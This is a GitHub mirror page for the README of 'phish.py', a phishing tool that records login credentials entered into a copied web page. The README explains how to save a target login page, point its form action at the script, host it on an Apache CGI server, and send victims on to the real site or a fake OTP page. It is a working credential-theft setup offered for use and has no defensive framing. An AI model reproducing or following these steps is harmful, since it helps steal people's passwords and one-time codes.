GithubHelp home page GithubHelp logo

phish.py's Introduction

phish.py

This program will save all login information from a webpage & giving you full control like where you want to redirect your webpage after saving credentials (Any other login or OTP page).

Usage:

  1. Download your webpage from browser by right clicking on empty space & selecting "Save Page As" or by pressing "ctrl+s".

  2. Open your downloaded webpage with notepad & search for "action=".

  3. Change value of "action" attribute to "phish.py".

    Example: <form action="login.php"> to <form action="phish.py">

  4. Now configure your webserver to run python CGI programs. (How to configure Xampp/Apache is given in Apache Configuration file.)

  5. Copy your edited webpage to server directory (htdocs/www).

  6. Start your server.

[You're done!]

Note:

*Change the first line of program "#!C:\Python34\python" to your python installation directory.

*You can choose where you want your website to redirect by changing the value of location header.

Example: Change print("Location:https://www.facebook.com/") to print("Location:https://www.twitter.com/").

*You can also redirect your webpage to any other login or fake OTP page.

*Don't remove empty lines.

phish.py's People

Contributors

kushvaibhav avatar

Stargazers

 avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar

Watchers

 avatar

Recommend Projects

  • React photo React

    A declarative, efficient, and flexible JavaScript library for building user interfaces.

  • Vue.js photo Vue.js

    ๐Ÿ–– Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.

  • Typescript photo Typescript

    TypeScript is a superset of JavaScript that compiles to clean JavaScript output.

  • TensorFlow photo TensorFlow

    An Open Source Machine Learning Framework for Everyone

  • Django photo Django

    The Web framework for perfectionists with deadlines.

  • D3 photo D3

    Bring data to life with SVG, Canvas and HTML. ๐Ÿ“Š๐Ÿ“ˆ๐ŸŽ‰

Recommend Topics

  • javascript

    JavaScript (JS) is a lightweight interpreted programming language with first-class functions.

  • web

    Some thing interesting about web. New door for the world.

  • server

    A server is a program made to process requests and deliver data to clients.

  • Machine learning

    Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.

  • Game

    Some thing interesting about game, make everyone happy.

Recommend Org

  • Facebook photo Facebook

    We are working to build community through open source technology. NB: members must have two-factor auth.

  • Microsoft photo Microsoft

    Open source projects and samples from Microsoft.

  • Google photo Google

    Google โค๏ธ Open Source for everyone.

  • D3 photo D3

    Data-Driven Documents codes.